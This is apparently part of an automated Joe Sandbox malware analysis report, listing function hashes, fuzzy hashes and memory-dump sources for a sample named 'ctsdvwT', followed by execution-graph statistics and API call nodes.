                                • Opcode Fuzzy Hash: 950c1746191e7de52a97e93c74c1f2c20457482e600189f34cbc3a708fc3ca17
                                • Instruction Fuzzy Hash: A8318D35E006099FDB18DFA4D4946AEB7F2FF88310F108569E846EB345EB70AC46DB50
                                Function 00F671F8 Relevance: .1, Instructions: 95COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2ab0f275738ca91b2c0c1095364ec8a06bda6e3b381df3aecc910a873c6844e
                                • Instruction ID: 910ccfdbae9b0e3361dcdc0e98abfa6f3be678aceed9e7fe77266b4f4fa8ed30
                                • Opcode Fuzzy Hash: e2ab0f275738ca91b2c0c1095364ec8a06bda6e3b381df3aecc910a873c6844e
                                • Instruction Fuzzy Hash: CF316C31E142099BEB15EFA9D55179EB7B2FF85318F208529F801FB240EBB0ED419B90
                                Function 00F671E9 Relevance: .1, Instructions: 95COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44d97929ea3a2628ac3b03536579f08fd89930e52674b5947abbcfe11338d322
                                • Instruction ID: db1ef17f369d1fff57ccc9b0889ccf323f023c3177c10869086302a3409ab869
                                • Opcode Fuzzy Hash: 44d97929ea3a2628ac3b03536579f08fd89930e52674b5947abbcfe11338d322
                                • Instruction Fuzzy Hash: 20317E30E142098FEB15DFA4D46179EB7B2FF85718F608529E802FB241EB70AD429B50
                                Function 00F626F4 Relevance: .1, Instructions: 94COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2a0a783304fefc7b76f1198490d8cdec400c52246433e67f494d9e18424f728
                                • Instruction ID: 17d9214f05936e8d90993d18a28164f100d33bb2dd1cf5fc1e9d65df6a30d94d
                                • Opcode Fuzzy Hash: c2a0a783304fefc7b76f1198490d8cdec400c52246433e67f494d9e18424f728
                                • Instruction Fuzzy Hash: 9941D0B4D003499FDB10CFA9C584BDEBBF5BF48314F24842AE819AB250DBB59949DB90
                                Function 00F6ECD0 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 34037f1041d8b7e0fcab5a4d60995695ef0a3d421f6ed03329a80a51ea93eefc
                                • Instruction ID: 3573efc3ad8c133705482b6030b91049e3d4f6fb3287cb4e46bf9585c01045fa
                                • Opcode Fuzzy Hash: 34037f1041d8b7e0fcab5a4d60995695ef0a3d421f6ed03329a80a51ea93eefc
                                • Instruction Fuzzy Hash: E8315C35E006099FDB18DFA4D4946AEB7B2FF88310F108569E806EB344DB70AC42DB50
                                Function 00F650B0 Relevance: .1, Instructions: 90COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c4b4ce629758dc534639731f4e8cb49fd6c9c377e82cdccb8180358f497cd65
                                • Instruction ID: 37033fb82028a9983ab2c33ebe955bb738eae0cc1d6e23f4a50c7081a0b3dc44
                                • Opcode Fuzzy Hash: 1c4b4ce629758dc534639731f4e8cb49fd6c9c377e82cdccb8180358f497cd65
                                • Instruction Fuzzy Hash: EB319874A00614DFCF28EB74C9517AD77B2EF49710F2005A8D802AB391EB3ACD42DBA0
                                Function 00F62700 Relevance: .1, Instructions: 90COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: acfdeeb8f6fac6bd32a8fcd7f6b132991c68f99b67aec802b2698b099332f8a7
                                • Instruction ID: c61a23f831d8df1acd61eb6d89d6c817b4d8381e518dbe32c34bc95d281b05d0
                                • Opcode Fuzzy Hash: acfdeeb8f6fac6bd32a8fcd7f6b132991c68f99b67aec802b2698b099332f8a7
                                • Instruction Fuzzy Hash: 1141E0B0D00349DFDB10CFA9C584ADEBBF5FF48314F24842AE809AB250DB759985CB91
                                Function 00F650C0 Relevance: .1, Instructions: 89COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3ef25f55563aaa3a43551da4d67a5c76ee41151ca1937f6b2142af67c1df3044
                                • Instruction ID: 4c48b3516dde86d9aada03dc6e8ed5ba679775d356557bfcc45f0417c4002256
                                • Opcode Fuzzy Hash: 3ef25f55563aaa3a43551da4d67a5c76ee41151ca1937f6b2142af67c1df3044
                                • Instruction Fuzzy Hash: A3313474A006149FDF28EB74C9547AE77B2EF49754F200568D802AB394EB3ACD42DBA0
                                Function 00F616B8 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a6492dae49de2e77bcef4a117e3f6b95dcd95f9be24dd7a24feab8831ee64ac
                                • Instruction ID: fbd40b1e67eebf36abcc492465db688e9e996af36ac9049f8e8a0feda6906d04
                                • Opcode Fuzzy Hash: 2a6492dae49de2e77bcef4a117e3f6b95dcd95f9be24dd7a24feab8831ee64ac
                                • Instruction Fuzzy Hash: 9A310778A041018FEF12EBB8E45877A3B65FB85324F184969D006CB296DE30DC57EB51
                                Function 00F68D49 Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09b73dcc74c4c49f7fee2e66e8466b8ce962a9c16519fd138a7c2069098ee073
                                • Instruction ID: 57431624f9b1ae81e18ee8984feea737d4b0c961ee1aa34960ad464905dbaa7b
                                • Opcode Fuzzy Hash: 09b73dcc74c4c49f7fee2e66e8466b8ce962a9c16519fd138a7c2069098ee073
                                • Instruction Fuzzy Hash: 6831A071E0420A9FDB15CFA4D89069EBBB2FF99314F108659E405AB341DB71AC47DB90
                                Function 00F68D58 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e1f876137e03162be339d6543cb51bb394ac6f11bb5f58ca8dfa9a9888d3291
                                • Instruction ID: 18ed91ad4750d1252ab94edcc2eb09aab2b0fbe7d33f3dae2c632cf4d304e18a
                                • Opcode Fuzzy Hash: 0e1f876137e03162be339d6543cb51bb394ac6f11bb5f58ca8dfa9a9888d3291
                                • Instruction Fuzzy Hash: F6213031E0020A9BDB19DFA4D89069EF7B2FF99354F108659E805EB340DB71EC46DB90
                                Function 00F68C48 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4465d229222f9d88cb45bc38e66c72af0e358ccd18fcba77a013a9406c8b2685
                                • Instruction ID: 3b6cdb7715c1056400666b8143da0bcbecc94d9ff731f7bd86d4966ddace9319
                                • Opcode Fuzzy Hash: 4465d229222f9d88cb45bc38e66c72af0e358ccd18fcba77a013a9406c8b2685
                                • Instruction Fuzzy Hash: 7C214731E016199BDB15CF64C8506DEBBB2EF99350F208619E812FB391DF709C46DB61
                                Function 00F61380 Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 49381fc73467e8c7eaa5d3039124410834c40a1ca18829ce34e7307572010b69
                                • Instruction ID: 394b61c4abc7f9f6538777e1aa1412759ecf1a2c4400d0d8258fd5ac04455da9
                                • Opcode Fuzzy Hash: 49381fc73467e8c7eaa5d3039124410834c40a1ca18829ce34e7307572010b69
                                • Instruction Fuzzy Hash: 49213834E042418FEB326768E48937A3761F753321F280969E447C7385DF68CC96E742
                                Function 00F64FA0 Relevance: .1, Instructions: 73COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ba674166ff1f8d4ab6254d8dbc2d1db3b7280334321ec00056b5e4cc204c033c
                                • Instruction ID: a6e6b76f070de247d98e2b8a59e157894268b9d00bfc4746c0d7c848aa5b98d7
                                • Opcode Fuzzy Hash: ba674166ff1f8d4ab6254d8dbc2d1db3b7280334321ec00056b5e4cc204c033c
                                • Instruction Fuzzy Hash: B3215E35A001458FDB14EF74D559BADBBF1EF49700F104568E406EB3A1DB369D01DB50
                                Function 00F1D01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547595791.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f1d000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52c43fea6d8e1c3bab95d44021113eaa6a7cb8b9b2eab0c18935c40bb9ef5f1f
                                • Instruction ID: a63254c90adb91df868dc0e28378e81d8a888d74df89ebe4f5ff851c267b552d
                                • Opcode Fuzzy Hash: 52c43fea6d8e1c3bab95d44021113eaa6a7cb8b9b2eab0c18935c40bb9ef5f1f
                                • Instruction Fuzzy Hash: 9E21F276A04300DFDB14DF14D984B66BB75EB88324F20C56DD84A4B29AC33AD897DA62
                                Function 00F618A0 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c334f9725d7f984a3fd8b90c8ed604f66634561740dd91b8d999dfc26fa5425
                                • Instruction ID: f1c173a0ef304728c97e0f9ca0401912ee4bdc02374f251ac224abff70dab0f2
                                • Opcode Fuzzy Hash: 2c334f9725d7f984a3fd8b90c8ed604f66634561740dd91b8d999dfc26fa5425
                                • Instruction Fuzzy Hash: 96213675B00205CFEB24EB74C9257AE77F6BB49340F240468D106EB2A0EF368D51EBA1
                                Function 00F61891 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8812dfb4b7421b39ce5c4282c09f22bc761347ca8d9b8fab7f5abd7c3f89d87a
                                • Instruction ID: 950349e7082e0923bb9d72aa73bef91ab657a803cafe1660be45316a8e835cfb
                                • Opcode Fuzzy Hash: 8812dfb4b7421b39ce5c4282c09f22bc761347ca8d9b8fab7f5abd7c3f89d87a
                                • Instruction Fuzzy Hash: 08213975A00205CFEB24EB74C9657AD7BB2BF49300F240568D406EB264DB3A8D41EBA1
                                Function 00F68C58 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7367c12e223f76a191cd034cae6c487e4b0f791b637d25b2a537474f06c5fc6
                                • Instruction ID: 64e9b41256c02340c4be7044af3caba83f0806d22cd1d2c1c0fc581db0fdbc70
                                • Opcode Fuzzy Hash: d7367c12e223f76a191cd034cae6c487e4b0f791b637d25b2a537474f06c5fc6
                                • Instruction Fuzzy Hash: D2213331E006199BDB18DF68C85069EB7B2EF99350F20861AE815FB390DF70AC46DB60
                                Function 00F616C8 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ddbb0f57572c30def144505a77629587eb9b5d0836f9896f69db51f64031e267
                                • Instruction ID: a01f04e03bf7bab2bf5b5261b61750efb629b22b906d42bc04db86c7571e02bf
                                • Opcode Fuzzy Hash: ddbb0f57572c30def144505a77629587eb9b5d0836f9896f69db51f64031e267
                                • Instruction Fuzzy Hash: C4218178A041018FEF11FBB8E894B7E3765FB85324F148A25D006CB299EF34DC969B91
                                Function 00F66B8B Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 638c0b7d3ad796e32e75d21ab67adb0b46c144fd7c34bd0299a79c93243e56f2
                                • Instruction ID: 397e8d16706094af7e4dd1a5416a077aa9ad005672683e8f142ec43fb1ff9567
                                • Opcode Fuzzy Hash: 638c0b7d3ad796e32e75d21ab67adb0b46c144fd7c34bd0299a79c93243e56f2
                                • Instruction Fuzzy Hash: A521D62170D6C04FD303A77C98612993FB5EFC7705B0985EBD094CB29BDB295C06A391
                                Function 00F64FB0 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cedee44b35f4cf74f2ac7319cb1cee432a2630e5d8f770e842564dfa1f3aed75
                                • Instruction ID: 1b0917c42123db8316da03e14a1211a3d92c3aec49281e6d6484ff70183a85ba
                                • Opcode Fuzzy Hash: cedee44b35f4cf74f2ac7319cb1cee432a2630e5d8f770e842564dfa1f3aed75
                                • Instruction Fuzzy Hash: 0E211975A002099FDB54EB74D958B9E77F2EB48710F104568E406EB3A1DB36DD01EBA0
                                Function 00F60838 Relevance: .1, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8394631113a6ee6072214b8ee90cb36b6d8f39fcfbebced9671983b1954040b
                                • Instruction ID: 8d84ba4516175c6a90037fde6223d9de18a1688acf7bbb4bf26c31038f331ec8
                                • Opcode Fuzzy Hash: c8394631113a6ee6072214b8ee90cb36b6d8f39fcfbebced9671983b1954040b
                                • Instruction Fuzzy Hash: 32119E30E052044FEF2197B8885037B3765EB92364F34897AD442DF282DE25CD46ABC2
                                Function 00F1D005 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547595791.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f1d000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd2507edd18d7e0abab0ea49335103503336ca157678b50bf9a18155854b0853
                                • Instruction ID: 844c07f3934d54f9d0a1d7758da84089968cf57d5f7b77543775be93853db3c2
                                • Opcode Fuzzy Hash: cd2507edd18d7e0abab0ea49335103503336ca157678b50bf9a18155854b0853
                                • Instruction Fuzzy Hash: CF2192755093C08FCB02CF24D994755BF71EB46314F28C5EAD8498F6A7C33A984ADB62
                                Function 00F60848 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2dda5ece559cda5b40aaf6d3c299058fa26192434258b4cd72d28a687416815
                                • Instruction ID: a4aceaee1caa681099d0c75323fd785d313a683b23914cb9010cd5c0dbc0eb27
                                • Opcode Fuzzy Hash: c2dda5ece559cda5b40aaf6d3c299058fa26192434258b4cd72d28a687416815
                                • Instruction Fuzzy Hash: 4B113A30F042089BEF65EBB9C84472B3355EB85364F308969D006DF281DE25CC86ABC2
                                Function 00F614A2 Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 227e45a35ce3eb0fbb72ea09574ec66f2e0aeb73241221fd2ef6bdac60effccf
                                • Instruction ID: b54ea2ee71a5872c016dd0d1293e17ba3083a1a1b60382dcccd8eabbe65a79ea
                                • Opcode Fuzzy Hash: 227e45a35ce3eb0fbb72ea09574ec66f2e0aeb73241221fd2ef6bdac60effccf
                                • Instruction Fuzzy Hash: 00113331E012558FCF21EF7898511AEBBF5EF85325B2844B9D806E7202DB35DC42DB91
                                Function 00F617D9 Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 052eb832cccb18c06b8e982172b0d017601586fb7a7e2202cc1b097e9e4a8476
                                • Instruction ID: 68e7d5d81ab741fe5678281324e34f7b9dc15acf3a307e5cac9aee3039935f69
                                • Opcode Fuzzy Hash: 052eb832cccb18c06b8e982172b0d017601586fb7a7e2202cc1b097e9e4a8476
                                • Instruction Fuzzy Hash: A411C679F003565FCB10ABB598487AEBFB5FB48750F144565D906D3345EB34CC129790
                                Function 00F614B0 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd725d7251781e2f3ebbd458f23fd5d8e25d6295ae3455f2d3908526957a9a66
                                • Instruction ID: 321849bbf8f440e8ce5ce526784ede4760bcda150d2bda71ed2c0e56705de4c4
                                • Opcode Fuzzy Hash: cd725d7251781e2f3ebbd458f23fd5d8e25d6295ae3455f2d3908526957a9a66
                                • Instruction Fuzzy Hash: 1B014431E012159BCF21EFB9885119EB7F5FB49364B280479D406E7201EB35DC41DB95
                                Function 00F69398 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fb14b59459c53e6ab4b6a54529af28d8418b1c5a19949140cf09cf7a345ca321
                                • Instruction ID: dd391225acf7e891623e4ab1deb36925e529107bb85abb27050394c057af8d4a
                                • Opcode Fuzzy Hash: fb14b59459c53e6ab4b6a54529af28d8418b1c5a19949140cf09cf7a345ca321
                                • Instruction Fuzzy Hash: 1D01B530A00204CBDB00EF95DD4478AB775FF84310F54C164C8085F296DBB5ED45C7A1
                                Function 00F66BB2 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e8075bfcce49a287bd071eee6852e6537cd947055ce7cbe82b5372f32b657eae
                                • Instruction ID: 6359ce5853590d877bbcb69ff79c1940e37b88c921ef74847b509f9e4f142f7b
                                • Opcode Fuzzy Hash: e8075bfcce49a287bd071eee6852e6537cd947055ce7cbe82b5372f32b657eae
                                • Instruction Fuzzy Hash: 81F0FF31B001149FC314ABB9C4206AE7BA6EFC9314B20847ED40ACB792DF768C41ABE1
                                Function 00F69627 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7a02bf3163f68dcbdc6b8053f25e60ccf9e278ee495dd5d2828ca727a2ada71
                                • Instruction ID: 127da95c235f3ae14371b4cd3bc0b7ff4261376b1d6eace8acc1b12d548164a3
                                • Opcode Fuzzy Hash: b7a02bf3163f68dcbdc6b8053f25e60ccf9e278ee495dd5d2828ca727a2ada71
                                • Instruction Fuzzy Hash: 1DF08B32D0D2204BCF229A64D8441EE7FF8DF85230F0D8862C441DB081C2718885D6A2
                                Function 00F67BE8 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a769b95bcf6d1afd8be453db534cbbda672afcb9695d8af99c050280b7565b61
                                • Instruction ID: 12a2783b89e397d9e651af59baa82e828dcf9ca3444260717d3a21f8057ce23e
                                • Opcode Fuzzy Hash: a769b95bcf6d1afd8be453db534cbbda672afcb9695d8af99c050280b7565b61
                                • Instruction Fuzzy Hash: 90018470904208DFDB01FBE4E8516DCBBB1EF81304F5086A9C4459B295DF315E5AAB92
                                Function 00F6153C Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f835ced5df0e2806a4042b7de2019a9fac80a2c9b0aa4c571c4c457069a53440
                                • Instruction ID: 033cdf230b683371ea7d8f8997841c3c7c0ce3ad81eef2b0d848988035c9aafa
                                • Opcode Fuzzy Hash: f835ced5df0e2806a4042b7de2019a9fac80a2c9b0aa4c571c4c457069a53440
                                • Instruction Fuzzy Hash: 8FF09033A04150CBDB228FA898911ADFBB1FA9532176D40AAD807DB252DB36DC46EB51
                                Function 00F67BF8 Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9728f51a1b853b442f569827ca39927121e1c1583049d2cd47e219bf1bc18019
                                • Instruction ID: d61b6344389d5f0e7d5ea1b40d9c9a1a6f22bf7089100579001fb353f7b1d2fa
                                • Opcode Fuzzy Hash: 9728f51a1b853b442f569827ca39927121e1c1583049d2cd47e219bf1bc18019
                                • Instruction Fuzzy Hash: 6FF04F70900208DFDF01FBE8F95169DBBB5EF80304F508668C0059B294EF31AE56AB91

                                Execution Graph

                                Execution Coverage:10.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:250
                                Total number of Limit Nodes:15
                                execution_graph 20630 131b020 20631 131b062 20630->20631 20632 131b068 GetModuleHandleW 20630->20632 20631->20632 20633 131b095 20632->20633 20634 131d300 DuplicateHandle 20635 131d396 20634->20635 20636 6096ede 20637 6096ee4 20636->20637 20642 6097be2 20637->20642 20660 6097bf0 20637->20660 20678 6097c56 20637->20678 20638 6096eef 20643 6097be4 20642->20643 20654 6097c12 20643->20654 20697 6098129 20643->20697 20702 60981f7 20643->20702 20706 6098890 20643->20706 20711 60986bc 20643->20711 20716 60981bd 20643->20716 20721 60983c6 20643->20721 20725 6098107 20643->20725 20730 6098483 20643->20730 20736 6098123 20643->20736 20741 60984ef 20643->20741 20746 60982cc 20643->20746 20751 60981aa 20643->20751 20760 609802b 20643->20760 20765 60985ab 20643->20765 20769 609884b 20643->20769 20654->20638 20661 6097c0a 20660->20661 20662 6098129 2 API calls 20661->20662 20663 609884b 2 API calls 20661->20663 20664 60985ab 2 API calls 20661->20664 20665 609802b 2 API calls 20661->20665 20666 60981aa 4 API calls 20661->20666 20667 60982cc 2 API calls 20661->20667 20668 60984ef 2 API calls 20661->20668 20669 6098123 2 API calls 20661->20669 20670 6098483 2 API calls 20661->20670 20671 6098107 2 API calls 20661->20671 20672 6097c12 20661->20672 20673 60983c6 2 API calls 20661->20673 20674 60981bd 2 API calls 20661->20674 20675 60986bc 2 API calls 20661->20675 20676 6098890 2 API calls 20661->20676 20677 60981f7 2 